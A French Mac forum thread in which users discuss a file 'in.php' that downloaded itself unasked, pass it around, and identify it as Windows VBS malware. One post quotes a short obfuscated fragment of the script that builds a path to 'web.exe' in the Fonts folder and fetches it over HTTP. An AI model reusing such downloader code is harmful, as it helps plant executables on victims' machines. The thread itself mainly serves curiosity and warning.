Téléchargement étrange

kathy h

Membre expert
Club iGen
25 Janvier 2005
3 121
313
57
75 et 78
www.cabinet-helayel-bento.com
depuis ce matin à 2 reprises alors que je passe de plusieurs sites connus et sur à macgé sans rien faire ni rien cliquer, un dossier ce télécharge tout seul sur mon bureau son nom : "in.php" je l'ai jeté sans l'ouvrir, savez vous ce que cela peut-être et comment , alors que je n'ai rien demandé , un dossier peut se télécharger tout seul sur le bureau? :mad: :eek:


EDIT : A LA DEMANDE GÉNÉRALE J'AI JOINT CE " VIRUS " EN DOCUMENT JOINT, AVIS AUX AMATEURS ( enfin pas si vous êtes sous windaube :D :D )

Edit 2 : Il semble que ce soit bel et bien un virus pour window ( ouf) qui soit arrivé je ne sais trop comment sur mon bureau en téléchargement automatique , tout seul quoi !!

si vous êtes sur PC méfiance ;)

Edit 3 ; ayant eu la confirmation qu'il s'agit bien d'un virus j'ai supprimé le fichier joint, si vous voulez savoir ce qu'il contenait demandez à marco 68 car non seulement il a ouvert le dossier sur mac , mais surtout il se l'ait envoyé par mail sur son PC ...
 
kathy h a dit:
depuis ce matin à 2 reprises alors que je passe du site de simonganière à macgé sans rien faire ni rien cliquer, un dossier ce télécharge tout seul sur mon bureau son nom : "in.php" je l'ai jeté sans l'ouvrir, savez vous ce que cela peut-être et comment , alors que je n'ai rien demandé , un dossier peut se télécharger tout seul sur le bureau? :mad: :eek:

Tu peux me donner l'adresse exacte du premier site pour que j'aille voir si ça me fait pareil ?
 
Marco68 a dit:
Tu peux me donner l'adresse exacte du premier site pour que j'aille voir si ça me fait pareil ?

je ne pense pas que cela vienne de ce site car si mes souvenirs sont bons et apres réflexion, ce matin j'étais sur un autre site celui de Macdigit...

maintenant je peux vous mettre de dossier au téléchargement sur macgé si une personne veut l'ouvrir ?
;)

je reviens avec les 2 liens . on sait jamais
 
kathy h a dit:
je ne pense pas que cela vienne de ce site car si mes souvenirs sont bons et apres réflexion, ce matin j'étais sur un autre site celui de Macdigit...

maintenant je peux vous mettre de dossier au téléchargement sur macgé si une personne veut l'ouvrir ?
;)

je reviens avec les 2 liens . on sait jamais

Vas-y : j'ouvre !!!
 
Hello tout le monde :coucou:

Kathy, tu peux me l'envoyer aussi s.t.p ? tu as mon mail dans mon profil... je suis currieux de savoir ce que c'est comme fichier... et si tu peux me donner aussi le lien sur le site pour voir...
 
je vous donne les liens des sites mais ce sont des sites que je visite tous les jours et ils n'y a aucun problème et cela ne semble pas lié mais bon, en plus ce sont des sites mac, cela ne doit pas venir d'eux.

donnez moi vos adresse e mail en PV je vous l'adresse

http://www.cuk.ch/index.php et http://www.simonganiere.ch/modules/news/ ( donc ça ne peut pas provenir de ces adorables sites
 
J'ai essayé Cuk, SimonGarnier et MacDigit, effectivement aucun problème avec eux...
 
Marco68 a dit:
Trouve un moyen, ca m'interesse ce fichier php !!!

C'est marrant, des macusers tout fébrile quand il s'agit de faire mumuse avec des applications inconnues :D

En face, ils seraient déjà tous mort de peur :rateau:

C'est le thread pour faire switcher les peureux du réseau :love: :up:
 
j'ai ouvert ce fichier, c'est un script en vbs...
Il appelle un executable de type .exe pour les pc, pas de souci pour toi, normalement,
le VBS c'est pas mon truc, je ne saurais m'aventurer plus loin, mais en tous les cas, pas de souci sur un mac, je pense....
 
valoriel a dit:
C'est marrant, des macusers tout fébrile quand il s'agit de faire mumuse avec des applications inconnues :D

En face, ils seraient déjà tous mort de peur :rateau:

C'est le thread pour faire switcher les peureux du réseau :love: :up:

Et ils sont tous prêt à l'ouvrir....
:D

et toi tu l'as ouvert mon fichier joint en zip ??
 
Marco68 a dit:
j'ai ouvert ce fichier, c'est un script en vbs...
Il appelle un executable de type .exe pour les pc, pas de souci pour toi, normalement,
le VBS c'est pas mon truc, je ne saurais m'aventurer plus loin, mais en tous les cas, pas de souci sur un mac, je pense....

Cela ne m'explique pas comment et pourquoi ce fichier s'est téléchargé tout seul et 2 fois dans la même journée. ( ce matin et ce soir )

je peux vous assurer que sur les sites en question il n'y a rien à cliquer et certainement pas des fichiers en ".exe "
:D

ça m'intrigue ce truc quand même , pourquoi moi??? :mad: :mad:
 
NightWalker a dit:
Hello tout le monde :coucou:

Kathy, tu peux me l'envoyer aussi s.t.p ? tu as mon mail dans mon profil... je suis currieux de savoir ce que c'est comme fichier... et si tu peux me donner aussi le lien sur le site pour voir...

Alors docteur ?
 
J'ai ouvert le script avec "TextEdit"... et je pense que c'est une fois de plus destiné pour Windows. Il y a quand même ces lignes qui m'intriguent :


ddd = shell.SpecialFolders("Fonts") + "\" + "web.exe"
set dot=CreateObject(strreverse(megret))
dot.Open "GET", "../web.exe", false


On dirait que ce script télécharge sur le net un fichier qui s'appelle "web.exe"... et voilà ce que je trouve sur WEB.EXE... ;)